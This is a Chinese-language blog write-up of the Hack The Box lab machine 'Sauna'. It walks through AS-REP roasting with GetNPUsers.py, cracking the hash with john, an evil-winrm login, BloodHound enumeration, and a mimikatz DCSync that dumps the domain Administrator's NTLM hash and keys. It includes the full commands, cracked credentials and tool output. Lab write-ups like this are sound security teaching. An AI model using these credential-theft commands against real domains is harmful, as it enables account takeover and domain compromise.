Hack The Box - Sauna

作者: 半夜菊花茶 | 来源:发表于2020-05-20 19:23 被阅读0次

    概述

    目标主机是一台Windows域控服务,同时还搭建了一个web网站,网站本身似乎没有太多突破口,于是渗透的思路聚焦于Windows凭据的突破。渗透过程大致为,通过网站的About页面猜测用户名,然后使GetNPUser.py尝试获取用户的TGT,然后用John爆破出口令,再使用evil-winrm访问目标主机。在主机上使用winPEAS.exe收集主机信息,发现主机上存在更多的可用账号以及一个默认口令,其中包括一个叫svc_loanmgr的账号,使用BloodHund收集域信息,发现该账号有权限实施DCSync攻击,接下来使用mimikatzsecretdump.py获取管理员账号的ntlm hash,然后使用evil-winrm进行pth以管理员账号登录目标机器并获取root.txt

    信息收集

    先上namp扫描端口

     nmap -sV -sC 10.10.10.175
    
    nmap
    从扫描接口可以看到,慕白机器开放了80、139和445端口,并且从返回信息可以看到目标AD域名是EGOTISTICAL-BANK.LOCAL,可以推测出目标机器是一个windows的域服务。用浏览器访问80端口,查看web页面,经过一通操作并没有发现什么可利用的弱点。
    about
    接下来尝试通过AD的认证找到突破,在网站的ahout页面看到一些人名,这里猜测这些人名可能正好是某个账号,这里把人名保存到user.txt
    users.png
    使用impacket下面的GetNPUsers.py尝试获取TGT,查看输出到hash.txt的结果,可以看到我们获取到了FSmith用户的口令hash
    impacket.png

    GetNPUsers.py可以查询域控中不需要Kerberos预认证的用户,这种配置在域控中体现为账号勾选了Do not require Kerberos preauthentication选项,很显然会让账号变得不安全

    密码爆破

    拿到了fsmith的口令hash,下一步需要尝试爆破这个口令,这里使用john

    ~$ john hash.txt --wordlist=/usr/share/wordlists/rockyou.txt
    Using default input encoding: UTF-8
    Loaded 1 password hash (krb5asrep, Kerberos 5 AS-REP etype 17/18/23 [MD4 HMAC-MD5 RC4 / PBKDF2 HMAC-SHA1 AES 128/128 SSE2 4x])
    Will run 2 OpenMP threads
    Press 'q' or Ctrl-C to abort, almost any other key for status
    Thestrokes23     ($krb5asrep$23$fsmith@EGOTISTICAL-BANK.LOCAL)
    1g 0:00:00:39 DONE (2020-02-15 23:13) 0.02532g/s 266871p/s 266871c/s 266871C/s Thing..Thereisnospoon
    Use the "--show" option to display all of the cracked passwords reliably
    Session completed
    

    这里直接爆破出了明文口令,然后然后我们使用evil-winRM远程连接目标机器

    evil-winrm -u FSmith -p Thestrokes23 -i 10.10.10.175
    
    winrm.png

    Windows 的远程管理管理服务WinRM默认使用5985端口,是微软服务器硬件管理功能的一部分,能够对本地或远程的服务器进行管理。WinRM服务能够让管理员远程登录Windows操作系统,获得一个类似Telnet的交互式命令行shell,而底层通讯协议使用的是HTTP。使用evil-winrm可以利用明文用户口令或者口令hash登录服务器并获取一个powershell的session。

    权限提升

    为了进一步查找目标主机上可以利用的弱点信息,我们使用winPEAS.exe对目标环境做进一步扫描,可以使用evil-winrmupload命令直接上传文件,然后执行./winPEAS.exe,从反馈信息里发现一个新的账号svc_loanmanager还有他的口令。

    image.png

    为了进一步获取域管理权限,这里选择使用BloodHound扫描域信息,将SharpHound.exe上传到目标服务并执行

    image.png
    将收集到的信息导入BloodHound生成拓扑图,从图上可以看到,svc_loanmanagerGetchangesAll权限,鼠标右键点击这个按钮,在弹出菜单中选择help查看提示
    bloodhound.png

    根据提示,这个利用svc_loanmanager可以实施DcSync攻击

    mimikatz

    直接上传mimikatz.exe到目标主机,执行dcsync获取administrator账号的ntlm hash

    *Evil-WinRM* PS C:\tmd> ./mimikatz.exe "lsadump::dcsync /user:administrator"
    
      .#####.   mimikatz 2.2.0 (x86) #18362 Feb  8 2020 12:26:09
     .## ^ ##.  "A La Vie, A L'Amour" - (oe.eo)
     ## / \ ##  /*** Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com )
     ## \ / ##       > http://blog.gentilkiwi.com/mimikatz
     '## v ##'       Vincent LE TOUX             ( vincent.letoux@gmail.com )
      '#####'        > http://pingcastle.com / http://mysmartlogon.com   ***/
    
    mimikatz(commandline) # lsadump::dcsync /user:administrator
    [DC] 'EGOTISTICAL-BANK.LOCAL' will be the domain
    [DC] 'SAUNA.EGOTISTICAL-BANK.LOCAL' will be the DC server
    [DC] 'administrator' will be the user account
    
    Object RDN           : Administrator
    
    ** SAM ACCOUNT **
    
    SAM Username         : Administrator
    Account Type         : 30000000 ( USER_OBJECT )
    User Account Control : 00010200 ( NORMAL_ACCOUNT DONT_EXPIRE_PASSWD )
    Account expiration   : 
    Password last change : 1/24/2020 9:14:15 AM
    Object Security ID   : S-1-5-21-2966785786-3096785034-1186376766-500
    Object Relative ID   : 500
    
    Credentials:
      Hash NTLM: d9485863c1e9e05851aa40cbb4ab9dff
        ntlm- 0: d9485863c1e9e05851aa40cbb4ab9dff
        ntlm- 1: 7facdc498ed1680c4fd1448319a8c04f
        lm  - 0: ee8c50e6bc332970a8e8a632488f5211
    
    Supplemental Credentials:
    * Primary:NTLM-Strong-NTOWF *
        Random Value : caab2b641b39e342e0bdfcd150b1683e
    
    * Primary:Kerberos-Newer-Keys *
        Default Salt : EGOTISTICAL-BANK.LOCALAdministrator
        Default Iterations : 4096
        Credentials
          aes256_hmac       (4096) : 987e26bb845e57df4c7301753f6cb53fcf993e1af692d08fd07de74f041bf031
          aes128_hmac       (4096) : 145e4d0e4a6600b7ec0ece74997651d0
          des_cbc_md5       (4096) : 19d5f15d689b1ce5
        OldCredentials
          aes256_hmac       (4096) : 9637f48fa06f6eea485d26cd297076c5507877df32e4a47497f360106b3c95ef
          aes128_hmac       (4096) : 52c02b864f61f427d6ed0b22639849df
          des_cbc_md5       (4096) : d9379d13f7c15d1c
    
    * Primary:Kerberos *
        Default Salt : EGOTISTICAL-BANK.LOCALAdministrator
        Credentials
          des_cbc_md5       : 19d5f15d689b1ce5
        OldCredentials
          des_cbc_md5       : d9379d13f7c15d1c
    
    * Packages *
        NTLM-Strong-NTOWF
    

    secretdump.py

    也可以使用impacket的secretdump.py脚本远程直接dump口令hash

    相关文章

      网友评论

        本文标题:Hack The Box - Sauna

        本文链接:https://www.haomeiwen.com/subject/equuohtx.html